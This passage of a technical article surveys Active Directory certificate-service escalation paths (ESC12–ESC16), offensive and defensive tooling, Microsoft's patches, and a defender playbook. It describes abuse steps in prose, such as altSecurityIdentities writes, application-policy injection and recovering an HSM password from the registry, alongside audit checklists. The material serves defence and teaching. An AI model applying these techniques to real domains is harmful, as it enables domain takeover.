ESC13 -- Issuance Policy linked to AD Group via msDS-OIDToGroupLink. Active Directory issuance-policy OIDs can be linked to a security group via the msDS-OIDToGroupLink attribute. When a certificate carries that issuance-policy OID, the issued PAC includes the linked group. A template configured with such an issuance policy effectively grants its enrollees membership in the linked group at authentication time. Disclosed by Jonas Bülow Knudsen at SpecterOps on February 14, 2024; discovery credit goes to Adam Burford, who brought the technique to Knudsen and Stephen Hinck [@knudsen-esc13]. BloodHound CE edge: ADCSESC13.

ESC14 -- Explicit altSecurityIdentities Write. A principal with write access to a privileged user's altSecurityIdentities attribute can add their own certificate's X.509 expression to that attribute, then authenticate as the privileged user. The prior art goes back to Géraud de Drouas in 2019 [@dedrouas-altsec] and Jean Marsault at Wavestone in June 2021 [@marsault-wavestone]; Knudsen catalogued it as ESC14 in February 2024 [@knudsen-esc14]. No BloodHound CE edge today; the abuse traces through a write right on a single AD attribute and is in scope for future BloodHound coverage.

ESC15 -- V1 Template Application Policies Override (EKUwu). The pre-installed V1 WebServer template -- which ships on every CA, cannot be deleted, and is enrollable by Authenticated Users by default -- accepts Application Policies extensions in the request. Application Policies, a Microsoft extension parallel to standard EKU, are honored by the KDC. An attacker submits a CSR adding the Client Authentication Application Policy to a WebServer certificate, gets it signed, and authenticates as the requester. Disclosed by Justin Bollinger at TrustedSec on October 8, 2024 [@bollinger-ekuwu]. Microsoft assigned CVE-2024-49019 and patched it on November 12, 2024 [@cve-2024-49019-msrc]. No BloodHound CE edge.

ESC16 -- CA-wide SID Extension Disabled. The CA's DisableExtensionList registry value can list OIDs the CA will omit from issued certificates. If szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) is on that list, the CA stops embedding the SID extension globally, and the strong-mapping enforcement of KB5014754 collapses into weak mapping for every certificate the CA issues. The SpecterOps Certify documentation records the punchline: "The configuration was first described in 2022 by Will Schroeder in this blogpost as a temporary workaround for the interaction between ESC7 and ESC6, but was later tagged ESC16 by Oliver Lyak" [@specterops-esc16-docs]. No BloodHound CE edge.

ESC12 lives in a different primitive category from every other ESC: it attacks the CA's HSM, not its software configuration. Hans-Joachim Knobloch's October 2023 disclosure (earliest Wayback snapshot dated October 24, 2023) observes that the YubiHSM2 Key Storage Provider on AD CS stores the HSM authentication key in cleartext under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` [@knobloch-esc12] [@knobloch-esc12-archive]. A non-administrative user with shell access to the CA and read on that registry key can recover the HSM password and forge certificates against the HSM-backed CA key. Out of body scope for this article; readers running YubiHSM-backed CAs should read Knobloch's primary source.

By the time you reach ESC10 here, a pattern is visible without anyone naming it: every Microsoft mitigation in this class is followed by a new ESC that side-steps it. KB5005413 closes ESC8 over HTTPS; ESC11 routes around it via RPC. KB5014754 closes ESC9 and ESC10 under Full Enforcement; ESC16 disables the underlying SID extension. CVE-2024-49019 closes ESC15 on V1 templates; the V1 templates themselves remain on every CA. The catalog grows faster than the patches.

Of the sixteen entries above, BloodHound CE ships eleven principal-graph edges covering eight distinct ESCs: ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a/b, ADCSESC9a/b, ADCSESC10a/b, ADCSESC13, plus the CoerceAndRelayNTLMToADCS edge that graphs ESC8 [@bh-llms]. The remaining eight ESCs (ESC2, ESC5, ESC7, ESC11, ESC12, ESC14, ESC15, ESC16) are out of edge coverage today -- some because their primitive lives below the principal graph (ESC11's RPC transport), some because their abuse is a CA-side write rather than a domain principal relationship (ESC7, ESC5), and some because they are too new to have been edge-modeled (ESC14, ESC15, ESC16). The gap is structural and operationally significant; section eight explores why.

flowchart TD subgraph TEMPLATE[Template] E1[ESC1 ESS+ClientAuth+LowPriv
SpecterOps 2021] E2[ESC2 AnyPurpose/SubCA
SpecterOps 2021] E3[ESC3 Enrollment Agent
SpecterOps 2021] E15[ESC15 V1 AppPolicy
TrustedSec 2024] end subgraph ACL[Access Control] E4[ESC4 Template DACL
SpecterOps 2021] E5[ESC5 PKI Object DACL
SpecterOps 2021] E7[ESC7 CA DACL
SpecterOps 2021] end subgraph CA[CA Configuration] E6[ESC6 EDITF SAN2
SpecterOps 2021] E16[ESC16 Disable SID Ext
tagged Lyak 2025] end subgraph TRANSPORT[Transport] E8[ESC8 Relay to HTTP
SpecterOps 2021] E11[ESC11 Relay to RPC
Compass 2022] end subgraph MAP[Mapping] E9[ESC9 No SID Ext
IFCR 2022] E10[ESC10 Weak Mapping
IFCR 2022] E13[ESC13 OIDToGroupLink
SpecterOps 2024] E14[ESC14 altSecurityIdentities
SpecterOps 2024] end subgraph HW[Hardware] E12[ESC12 YubiHSM Substrate
Knobloch 2023] end

The static rules that Certipy, Certify, Locksmith, and PSPKIAudit all run to decide whether a template is ESC1-shaped are simpler than the catalog above might suggest. Three boolean inputs, three conjunctive conditions, one output label.

{` function classifyTemplate(t) { const ess = t.flags.includes('CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'); const clientAuth = t.eku.includes('1.3.6.1.5.5.7.3.2'); const lowPriv = t.enroll.some(p => ['Authenticated Users', 'Domain Users'].includes(p)); const noApproval = !t.flags.includes('CT_FLAG_PEND_ALL_REQUESTS'); if (ess && clientAuth && lowPriv && noApproval) return 'ESC1'; return 'safe-for-now'; }

const wifi = { flags: ['CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'], eku: ['1.3.6.1.5.5.7.3.2'], enroll:['Authenticated Users'] }; console.log(classifyTemplate(wifi)); `}

6. The 2026 Toolchain

Sixteen ESCs is too many for one tool. The 2026 state of the art is a stack: defenders run Locksmith, PSPKIAudit, BloodHound CE, and Microsoft Defender for Identity in parallel; offense runs Certipy and Certify. No single tool covers every ESC, prioritizes its findings, and produces forensic primitives for response. Coverage gaps are structural, not accidental.

Certify is the original offense-side tool from the SpecterOps team that wrote Certified Pre-Owned. A C# Windows binary that enumerates and abuses AD CS misconfigurations using the operator's in-process credentials [@certify-gh]. Released at Black Hat 2021, built against .NET 4.7.2. Certify covers the ESC1 through ESC16 enumeration surface via its documentation pages [@specterops-certify-docs-index]; abuse implementations exist for the catalog's most operator-friendly entries, with ESC11 documented as enumeration-only at the most recent docs revision [@specterops-esc11-docs].

Certipy is the Linux-side sibling, written in Python by Oliver Lyak at IFCR (now an independent project) [@certipy-gh]. The README carries the strongest coverage claim in the tool community: "full support for identifying and exploiting all known ESC1-ESC16 attack paths." Certipy ships its own NTLM relay (certipy relay), embedded BloodHound output, certificate forging, and PKINIT-to-TGT exchange. The Certipy wiki's privilege-escalation page is the best walking reference for the entire catalog [@certipy-wiki-priv].

BloodHound Community Edition is the only tool in the stack that integrates AD CS findings into the broader Active Directory attack graph. SharpHound CE collects AD CS objects -- CAs, templates, NTAuth membership, per-template DACLs -- and the BloodHound server computes ten ADCSESC*N* edges (ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, ESC13) plus the CoerceAndRelayNTLMToADCS edge that graphs ESC8 via coercion [@bh-llms]. BloodHound CE 7.x added Privilege Zones, which let defenders tag NTAuth CAs and their templates as Tier-Zero objects and surface paths to them in the analysis UI.

The principal-graph model treats each AD object as a node and each access right or trust as an edge. The graph then path-finds from a starting principal to a Tier-Zero target. This model works elegantly for template DACLs (ESC4) and CA DACLs (ESC7) and for issuance-policy group linkage (ESC13). It struggles with attacks where the abuse is a transport-level interaction rather than a principal-to-principal relationship.

ESC8 used to be considered uncatchable in this model. The CoerceAndRelayNTLMToADCS edge solved that: BloodHound CE now models the SMB-coercion-plus-NTLM-relay-to-ESC8 chain as a Group-to-Computer edge whose source is Authenticated Users and whose destination is the coerced target computer; the relay target CA and the template are encoded in the edge's metadata, not as graph nodes [@bh-coerce-adcs-edge]. The edge exists because coercion has a stable shape -- an unauthenticated principal class, a target computer, and an ESC8-vulnerable CA endpoint reachable on the network -- that the graph can express.

ESC11 remains harder. The RPC enrollment transport does not have a stable coercion model (the trigger is ICertPassage packet privacy not being enforced, not a coercion gadget like MS-EFSR), and the BloodHound graph today does not ship an ADCSESC11 edge. The model limit is partial, not total. The conventional "BloodHound cannot graph transport attacks" framing -- which was the prevailing folklore through 2024 -- is wrong; ESC8 is in the graph. ESC11 is the open structural case.

Locksmith is a PowerShell defender tool by Jake Hildreth (with Spencer Alessi) [@locksmith-gh]. It runs locally on a domain-joined host and reports template, CA, and NTAuth-container findings against the catalog. Modes 0 through 4: identify-and-report, auto-remediate where safe, produce a CSV, and so on. The lowest-friction defender tool in the stack -- a single Invoke-Locksmith cmdlet returns a triage list against the published ESC range.

PSPKIAudit is the SpecterOps team's own defender baseline, built on top of PKI Solutions' PSPKI module [@pspkiaudit-gh]. Its Invoke-PKIAudit and Get-CertRequest cmdlets cover ESC1 through ESC8 plus the "Explicit Mappings" surface for ESC14. The README is marked beta; PSPKIAudit predates Locksmith and ships fewer remediation primitives, but it is the canonical reference for what the original SpecterOps team thinks the defensive audit should do.

Microsoft Defender for Identity ships the ADCS posture assessment suite when the MDI sensor is installed on the CA itself [@mdi-certs]. The current product surface assesses nine ESCs by name: ESC1 (Preview), ESC2, ESC3, ESC4 (split across two separate assessments -- template owner and template ACL), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15. The product page is explicit: "This assessment is available only to customers who have installed a sensor on an AD CS server." MDI's coverage is broad and operationally integrated -- the same SOC console that surfaces Pass-the-Hash detections now surfaces the largest named-ESC posture-assessment suite of any non-Certipy tool in the stack, with the ESC1 and ESC6 assessments shipped in Preview state.

The KB5014754 strong-mapping track is Microsoft's runtime mitigation rather than a tool, but operationally it belongs in the stack discussion because it is the largest single thing Microsoft has shipped for this class [@kb5014754]. Strong mapping closes ESC9 and ESC10 (plus Certifried CVE-2022-26923) under Full Enforcement, defaults to Compatibility through February 11, 2025, and removes the legacy-mapping registry override on September 9, 2025. Operationally this is a deployment decision more than a "tool to run", but every defender stack has to plan for it; the Microsoft Tech Community Intune blog is the cross-reference for environments using SCEP or PKCS [@ms-tc-intune].

The Hacker Recipes AD CS chapter is a community reference catalog rather than a runnable tool; it serves as the canonical operator-facing summary of every ESC and is worth bookmarking. (Network reachability of the canonical URL has been inconsistent in late 2025 / 2026.)

Here is a single-table comparison of the practical stack. The right answer for a real enterprise is roughly "all of them in parallel"; the table makes the coverage gaps explicit.

Tool / track	Language	ESC enumeration coverage	Abuse capable	Graph capable	Best deployed for	Source
Certify	C# (Windows)	ESC1 to ESC16 (per docs)	Yes (most)	No	Operator chains, Windows offense	[@certify-gh]
Certipy	Python (Linux)	ESC1 to ESC16 (README claim)	Yes	Embedded	Operator chains, Linux offense	[@certipy-gh]
BloodHound CE ADCS edges	Cypher	8 of 16 ESCs (11 edges: ten ADCSESCN + CoerceAndRelayNTLMToADCS)	No	Yes	Prioritization, attack-path analysis	[@bh-llms]
Locksmith	PowerShell	Published ESC catalog	Identify and fix	No	Operational scans on each CA	[@locksmith-gh]
PSPKIAudit	PowerShell	ESC1 to ESC8 plus Explicit Mappings	No (read-only)	No	Defender baseline, audit	[@pspkiaudit-gh]
MDI ADCS posture	SaaS	ESC1 (Preview), ESC2, ESC3, ESC4, ESC6 (Preview), ESC7, ESC8, ESC11, ESC15	No	Inside MDI console	SOC integration, posture scoring	[@mdi-certs]
KB5014754 strong mapping	Windows runtime	ESC9, ESC10, Certifried (mitigation)	n/a	n/a	Domain Controllers (deploy)	[@kb5014754]

Note: For most enterprises the realistic configuration is: Locksmith scheduled monthly on every CA; BloodHound CE with the ADCS collector enabled in SharpHound CE; Microsoft Defender for Identity sensor on every AD CS server (for the nine-ESC SOC visibility surface that now includes ESC1 and ESC6 in Preview); PSPKIAudit run once a quarter as the SpecterOps-blessed baseline; Certipy in the red-team or purple-team kit; and the KB5014754 rollout staged to land at Full Enforcement before February 11, 2025 (legacy-mapping removal September 9, 2025). The remaining gap items -- ESC5, ESC12, ESC14, and ESC16 (neither in BloodHound's principal graph nor in MDI's posture-assessment surface) -- are caught by Locksmith plus PSPKIAudit plus Certipy plus careful template review.

If no single tool covers everything, what is Microsoft actually doing about it?

7. What Microsoft Has Actually Shipped

Of sixteen named ESCs, Microsoft has shipped three CVE-class patches. The rest are hardening guidance. The asymmetry is not accidental; it tracks the boundary Microsoft draws in its Windows Security Servicing Criteria between default-state vulnerabilities (which receive CVEs and binary patches) and admin-configurable misconfigurations (which receive documentation). Most ESCs sit on the configurable side of that boundary.

Four Microsoft mitigation tracks define the response, in order of when they shipped.

KB5005413 (late July 2021) -- NTLM Web Enrollment hardening. Published roughly six weeks after Certified Pre-Owned in response to PetitPotam plus the SpecterOps ESC8 disclosure [@kb5005413]. Recommends enabling Extended Protection for Authentication, requiring SSL on the /certsrv/ virtual directories of AD CS Web Enrollment and the Certificate Enrollment Web Service, and disabling NTLM where Kerberos is available. Crucially: KB5005413 is guidance, not a binary patch. Environments that never enabled EPA on /certsrv/ remain exploitable today. The KB closes ESC8 over HTTPS when fully applied; it does not affect ESC11 (RPC), ESC1 through ESC7, or anything in the ESC9-plus range.

CVE-2022-26923 (May 10, 2022) -- Certifried. The single MSRC-acknowledged CVE in the original ESC1 through ESC8 design space [@cve-2022-26923-nvd] [@cve-2022-26923-msrc]. Disclosed by Oliver Lyak at IFCR [@lyak-certifried], the vulnerability lets any Authenticated User (because the default ms-DS-MachineAccountQuota is 10 [@semperis-cve]) create a computer account, write its dNSHostName to match a Domain Controller, request a certificate from the default Machine template, and PKINIT as the DC. Microsoft patched it on the May 10, 2022 Patch Tuesday. Semperis's retrospective documents the chain in detail [@semperis-cve]. The patch closes that specific path -- the dNSHostName impersonation race -- and is part of the same Patch Tuesday that shipped KB5014754. It does not close any other ESC.

KB5014754 (May 10, 2022 -- present) -- the strong-mapping rollout. The largest single Microsoft mitigation in the entire class [@kb5014754]. SpecterOps's own analysis -- "Certificates and Pwnage and Patches, Oh My!" -- remains the canonical walkthrough of how the new behavior interacts with the existing catalog [@specterops-pwnage].

The mechanics: KB5014754 introduces the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2), embeds the requester's SID into every issued certificate by default, and redefines which altSecurityIdentities mappings the KDC will accept. Deployment is staged across three modes -- Disabled, Compatibility, and Full Enforcement -- with the Full Enforcement transition originally planned for November 2023, then repeatedly delayed in response to customer compatibility issues with SCEP, Intune PKCS, and non-Microsoft PKIs. The KB's current text states that Full Enforcement becomes the default on February 11, 2025, and the legacy compatibility-mode registry override is removed by the September 9, 2025 Windows security update [@kb5014754].

What it closes: ESC9 (because Full Enforcement rejects certificates lacking the SID extension), ESC10 (because weak mappings are rejected), and Certifried even on unpatched templates. It is bypassed by ESC16, which disables the SID extension at the CA level.

CVE-2024-49019 (EKUwu / ESC15) -- November 12, 2024. Patched thirty-five days after Bollinger's October 8, 2024 disclosure [@bollinger-ekuwu]. The November 12, 2024 Patch Tuesday addressed the V1 WebServer template Application-Policies override [@cve-2024-49019-nvd] [@cve-2024-49019-msrc]. The patch hardens the KDC's interpretation of Application Policies in V1 certificates; it does not close ESC16, ESC11, or anything in the template DACL space.

Note: Microsoft's Windows Security Servicing Criteria reserves CVEs for vulnerabilities in default product state [@msrc-servicing-criteria]. Misconfigurations that require administrator action to introduce are treated as hardening matters and receive documentation rather than CVEs. The 2019 ANSSI altSecurityIdentities report received a "won't fix" response on exactly these grounds [@dedrouas-altsec]. The boundary explains the catalog's CVE asymmetry: ESC1 (template flag) is configuration; Certifried (a default-template behavior on an account-creation-default-permission interaction) is a CVE. ESC15 sat on the boundary -- the affected template is shipped pre-installed and cannot be uninstalled, so its default-state could be argued either way -- and Microsoft chose to issue a CVE. The boundary is operational policy, not technical bound; it can move.

The single most useful table in this article is the cross-reference of which Microsoft mitigation closes which ESC. Read row by row to understand which ESCs are runtime-closed in a hardened environment and which remain dependent on the customer's administrative hardening discipline.

ESC	KB5005413 (2021)	CVE-2022-26923 (2022)	KB5014754 (2022-2025)	CVE-2024-49019 (2024)	Hardening only
ESC1	--	--	Partial (SID ext defeats SAN supply for cert-authn)	--	Primary mitigation
ESC2	--	--	--	--	Yes
ESC3	--	--	Partial (SID ext binds the cert to the agent)	--	Yes
ESC4	--	--	--	--	Yes
ESC5	--	--	--	--	Yes
ESC6	--	--	Partial (SID ext defeats requested SAN)	--	Primary
ESC7	--	--	--	--	Yes
ESC8 (HTTP)	Closed when EPA + SSL deployed	--	--	--	Continues if EPA off
ESC9	--	--	Closed at Full Enforcement	--	Until Feb 2025
ESC10	--	--	Closed at Full Enforcement	--	Until Feb 2025
ESC11 (RPC)	--	--	--	--	Primary (`IF_ENFORCEENCRYPTICERTREQUEST` flag)
ESC12	--	--	--	--	Primary (HSM hardening)
ESC13	--	--	--	--	Yes
ESC14	--	--	--	--	Yes
ESC15	--	--	--	Closed (Nov 12, 2024)	--
ESC16	--	--	Bypassed (this attack disables the extension)	--	Primary

Of sixteen ESCs, three have CVE-class binary patches (Certifried, EKUwu, and -- if you count it -- the KB5005413 NTLM-relay hardening track), two are runtime-closed under KB5014754 Full Enforcement, and the remaining eleven are administrative hardening matters. If only three of sixteen have CVEs, what stops the catalog from growing forever?

8. The Two-Trust-Roots Problem

What stops the catalog from growing forever is the architectural property the catalog enumerates around but cannot eliminate. The catalog grows because the property is structural, not because the engineering is sloppy. Four pieces of theory anchor the limit.

Two trust roots. Active Directory's Kerberos KDC will mint a Domain Admin Ticket-Granting Ticket on presentation of any valid certificate signed by a CA in the forest's NTAuthCertificates container, provided the certificate maps to the Administrator principal. The krbtgt key is the symmetric root of trust for password and TGS authentication; an NTAuth CA's private key is an asymmetric root of trust for PKINIT. There is no architectural relationship between the two. Rotating the krbtgt key does not invalidate any certificate. Revoking a CA does not invalidate krbtgt-issued tickets. They are independent authenticator-minting keys. For a forest with $n$ NTAuth-published CAs, the count of independent keys that can mint a Domain Admin authenticator is $n + 1$.

Key idea: For an Active Directory forest with $n$ Certificate Authorities published into NTAuthCertificates, there are exactly $n + 1$ independent keys that can mint a Domain Admin authenticator: the krbtgt account hash, and the private key of every published CA. Rotating krbtgt closes one root. Revoking one CA closes another. The other $n - 1$ remain. The ESC catalog enumerates how an attacker can make those keys issue a Domain Admin authenticator with low-privilege materials; the architectural property -- that there are $n + 1$ such keys at all -- is a design property of PKINIT and is not closable by any patch [@rfc4556] [@cpo-whitepaper].

PKINIT's binding gap. RFC 4556 specifies how a Kerberos client presents a certificate and receives a TGT [@rfc4556]. The RFC does not bind the certificate to a Microsoft SID; the mapping from certificate to AD principal is a Microsoft extension. The KB5014754 strong-mapping track closes the mapping ambiguity by embedding the requester's SID into the certificate and matching the SID on the KDC side [@kb5014754]. It does not close the underlying primitive: a certificate is an alternate identity assertion that the KDC honors as long as the signing CA is trusted. Different ESCs find different ways to get a useful certificate; the authentication step is identical across the catalog.

The transport-versus-principal split. The §6 BloodHound Aside develops this in full: BloodHound's principal-graph model now expresses ESC8 as the CoerceAndRelayNTLMToADCS edge, but ESC11 remains the open structural case because the RPC transport has no equivalent coercion gadget [@bh-coerce-adcs-edge]. The model limit is partial, not total -- it applies to RPC, not to all transport attacks.

The configuration-versus-CVE boundary. The §7 Callout develops this in full. The catalog has accumulated CVEs only when Microsoft judged the configuration was default-state -- Certifried's machine-account-quota path and ESC15's pre-installed V1 templates. The architectural property is policy-driven and movable.

Active Directory has two trust roots that can mint a Domain Admin authenticator: the krbtgt key, and any CA published into NTAuth. Rotating one does not touch the other.

The architectural property reshapes how operators should think about the catalog. The catalog is not an arms race that ends; the catalog is the community mapping the surface of a design property of PKINIT. Each new ESC narrows the description of what surface remains exposed; no plausible patch removes the underlying $n + 1$ key count. Until PKINIT itself is replaced -- until PKINIT is deprecated, until the KDC stops accepting certificate-based authentication, until NTAuth-published CAs lose their KDC trust -- every NTAuth-published CA in the forest is a key parallel to krbtgt.

If the architectural limit cannot be closed, what are the open questions in 2026?

flowchart LR K[krbtgt account hash
symmetric KDC key] CA1[CA #1 private key
published in NTAuth] CA2[CA #2 private key
published in NTAuth] CAN[CA #n private key
published in NTAuth] KDC[Kerberos KDC
and PKINIT] AUTH[Domain Admin
authenticator TGT] K --> KDC CA1 --> KDC CA2 --> KDC CAN --> KDC KDC --> AUTH

9. Open Problems and the Catalog's Closure

The catalog has no published closure principle. Here are the five open frontiers in 2026.

No closure principle. The catalog has grown every year since 2021: ESC1 through ESC8 in June 2021; ESC9 and ESC10 in August 2022; ESC11 in November 2022; ESC12 in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive]; ESC13 and ESC14 in February 2024; ESC15 in October 2024; ESC16 named in 2025 against a workaround from 2022 [@specterops-esc16-docs]. ESC15 revealed a twenty-four-year-old default behavior on V1 templates -- behavior that had been quietly present since the role's 2000 shipping date [@bollinger-ekuwu]. The Certify documentation conjectures an upper bound (the six primitive categories times the misconfigurable bits per primitive) but no formal upper bound is published. ESC15 is itself an existence proof that new categories still emerge: Application Policies as a parallel to standard EKU was not in the original 2021 catalog at all.

Detection asymmetry. Most ESCs leave artifacts on the CA -- specifically Event ID 4886 (certificate request submitted) and Event ID 4887 (certificate issued) -- and no artifact in the standard Active Directory event stream. Most SIEMs do not ingest CA logs, because CA logs were never on the standard Tier-Zero ingest checklist. The result is that the CA's own audit log carries the only reliable forensic primitive for the entire catalog, and that log is in a place the SOC does not look. Locksmith and PSPKIAudit can identify the misconfigurations but cannot tell you whether they have been exploited; that signal lives in the CA's audit log alone.

Strong-mapping migration risk. The KB5014754 staged rollout enters Full Enforcement on February 11, 2025 and removes the legacy compatibility-mode registry override on September 9, 2025 [@kb5014754]. Environments with legacy SCEP gateways, third-party PKI vendors, Intune PKCS profiles without strong mapping, or smart cards issued by non-Microsoft CAs face a real risk that legitimate authentication breaks at Full Enforcement. The Microsoft Tech Community Intune guidance is the operational reference for the SCEP/PKCS path [@ms-tc-intune]. The migration is a security upgrade and a deployment minefield in the same package; environments that defer the rollout past September 9, 2025 lose the legacy override and are forced into Full Enforcement by an OS update they did not opt into.

Note: Per the live KB5014754 text on Microsoft Support: "By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers will move to Full Enforcement mode" and "the option to move back to Compatibility mode will remain until the September 9, 2025, Windows security update is installed" [@kb5014754]. Environments that have not finished the strong-mapping rollout by those dates -- particularly those with non-Microsoft PKI in the chain, including legacy SCEP / Intune PKCS / smart-card vendors -- should plan for breakage and have a rollback plan ready.

Cloud PKI. Entra-managed Cloud PKI changes the substrate: the issuing CA is Microsoft-operated, the template surface is partially exposed to administrators, and the trust relationship between Cloud PKI and on-premises Active Directory is itself a configurable bridge. The community has not yet published an ESC catalog for Cloud PKI; the on-premises catalog is on-prem-specific and does not transfer directly. The open question is whether the Cloud PKI substrate has its own equivalent primitives (a CA-side "this template is configured with ESS-equivalent behavior") that just have not yet been named.

The NTLM dependency in ESC8 and ESC11. Both ESC8 and ESC11 depend on NTLM authentication being available between the coerced computer and the CA host. Microsoft's stated direction is to disable NTLM by default in future Windows releases (the "NTLM disablement" track) [@ms-ntlm-evolution]. If that direction completes, ESC8 and ESC11's relay primitives lose their substrate -- not because the AD CS transport hardens, but because there is no NTLM authentication to relay. The rest of the catalog -- the template, ACL, mapping, and CA-configuration ESCs -- does not depend on NTLM and is unaffected by NTLM disablement.

Taken together, these results suggest the catalog's growth trajectory is structural. The reason ESC15 surfaced a twenty-four-year-old default is not that the SpecterOps team was lazy in 2021; it is that the surface is so large that systematic enumeration of every cross-product (six primitives multiplied by the configurable bits per primitive) is itself a research program. Knowing the architectural limits and the open problems, here is the operational playbook.

10. The Four-Lane Playbook

Here is what an enterprise security program actually does, in four lanes. Lane discipline matters because the catalog rewards parallel work: a single quarter spent only on Lane 1 leaves you detection-blind, and a single quarter spent only on Lane 2 leaves you remediation-paralyzed.

Lane 1: Preventive hygiene

Run Locksmith and PSPKIAudit on every Enterprise CA at least monthly [@locksmith-gh] [@pspkiaudit-gh]. Both tools enumerate the published catalog and produce a triage list. The defender baseline these tools encode is roughly:

Template ACL audit. Confirm that no non-Tier-Zero principal holds WriteDacl, WriteOwner, WriteProperty, or GenericAll on any V2 template.
CA security descriptor audit. Confirm that Manage CA and Issue and Manage Certificates are held only by Tier-Zero principals.
ESS audit. Confirm that no template enrollable by Authenticated Users or Domain Users has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set with Client Authentication EKU and no Manager Approval.
CA registry audit. Confirm that EDITF_ATTRIBUTESUBJECTALTNAME2 is not set, and IF_ENFORCEENCRYPTICERTREQUEST is set.
SID extension audit. Confirm that szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) is not present in any CA's DisableExtensionList registry value -- closing the ESC16 path.
Manager Approval on sensitive templates. Confirm that any template with privileged EKU sets has Manager Approval.
Least-privilege Enroll. Confirm that Domain Users-equivalent groups do not hold Enroll or Autoenroll on sensitive templates.

Lane 2: Detection deployment

Ingest the CA's own Security event log into the SIEM. The two load-bearing events are 4886 ("Certificate Services received a certificate request") and 4887 ("Certificate Services approved a certificate request and issued a certificate"). These events are what fire when an operator chain like the cold-open in section one executes. They are the only AD CS event stream the SOC needs to detect the entire issuance side of the catalog.

Enable Microsoft Defender for Identity sensors on every AD CS server. MDI now ships nine named ESC posture assessments -- ESC1 (Preview), ESC2, ESC3, ESC4 (template owner and template ACL as two separate assessments), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15 -- and surfaces them in the same console the SOC uses for the rest of Active Directory [@mdi-certs]. The ADCS-resident sensor is the only MDI sensor that produces these particular assessments; environments running MDI on Domain Controllers only do not get the AD CS surface.

Run SharpHound CE with the AD CS collection options enabled and ingest the resulting graph into BloodHound CE. Tag NTAuth-published CAs and their pre-installed sensitive templates as Tier Zero in BloodHound's Privilege Zones. Run the analysis layer's Shortest Paths to Tier Zero query weekly; ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, and ESC13 will surface as edges, along with CoerceAndRelayNTLMToADCS paths for any ESC8-vulnerable HTTP enrollment endpoint [@bh-llms] [@bh-coerce-adcs-edge].

Schedule Locksmith on a recurring cadence with output to a triage queue. Locksmith is the lowest-friction defender tool; it identifies and (with mode 1) optionally fixes published-catalog findings with a single cmdlet.

Lane 3: Confirmed-compromise response

This lane carries the article's load-bearing operational claim. If a CA's private key is suspected compromised -- whether through ESC12 hardware-substrate compromise, through ntdsutil-equivalent CA export, or through a vendor compromise of the HSM -- the recovery path is not "rotate krbtgt" and not "revoke the affected certificates". The recovery path is multi-week:

Revoke the CA's published certificate chain.
Decommission the CA (remove the role service, delete the CA private key store, retire the host).
Build a replacement CA on new hardware with a new key.
Publish the new CA into NTAuthCertificates.
Distrust the old CA's certificates throughout the forest (CRL update, certificate revocation lists pushed via Group Policy, decommissioning all certificates issued by the compromised CA).
Re-issue every credential that depended on the compromised CA.

This operation is analogous in scale and duration to a forest rebuild for krbtgt compromise -- a multi-week IR project, not a one-day patch. The reason is the two-trust-roots property: revoking the CA closes only one of the $n + 1$ keys; if the operator already minted Golden Certificates against the CA's private key, those certificates outlive the revocation unless every issued serial is on the CRL and every relying party has a fresh CRL fetch policy.

Note: The Lane-3 CA rebuild operation is the single most important preparatory deliverable in this entire playbook. Run a tabletop exercise: "the CA private key is compromised; what are the steps to a clean state?" If the answer is unclear in the absence of an incident, the answer will be improvised during one -- typically poorly. Build the runbook, identify the operational owners, pre-stage the replacement CA's hardware, and document the certificate inventory you will need to re-issue. The two-week recovery becomes a one-week recovery if the prep is done; the two-week recovery becomes a four-week recovery if it is not.

Lane 4: What does not work

Five operator myths that the catalog refutes by construction:

"Rotating krbtgt closes AD CS." Wrong. Rotating krbtgt closes the symmetric KDC key; it does not touch the asymmetric CA private keys in NTAuthCertificates. An ESC1 certificate issued against the new krbtgt mints a Domain Admin TGT the same way it would have against the old one.
"Credential Guard protects against ESC." Wrong. Credential Guard's LSAISO isolates LSASS-resident credentials from the rest of the OS. AD CS abuse does not touch LSAISO; the certificate is issued by the CA against a request submitted over a network protocol. The credential never leaves the attacker's machine in a form Credential Guard could isolate.
"Disabling Web Enrollment closes AD CS." Partial. Disabling the AD CS Web Enrollment role service closes ESC8 (the HTTP relay primitive). It does not affect ESC1 through ESC7 (template, ACL, and CA-config attacks), ESC11 (RPC relay), or any of the mapping ESCs. The default RPC enrollment transport on every Enterprise CA is unaffected.
"If we patch CVE-2022-26923 we're done." Wrong. CVE-2022-26923 closes the specific dNSHostName machine-account-impersonation chain. It does not close ESC1, ESC4, or any of the configuration ESCs that the same operator chain could have taken.
"Reset krbtgt twice and we have evicted the attacker." Wrong. The double-krbtgt-reset playbook is well-suited for Golden Ticket eviction. It is not effective against an attacker who has issued a long-validity authentication certificate from a CA the attacker controls or has compromised. The issued certificate authenticates against the new krbtgt the same way it did against the old one, because PKINIT does not bind the certificate's authority to the symmetric krbtgt key.

Run Locksmith this week. Tag NTAuth CAs as Tier Zero in BloodHound. Schedule the Lane 3 rebuild playbook before you need it. The catalog grew faster than the patches; the defender's only working strategy is parallel work in all four lanes.

11. Frequently Asked Questions

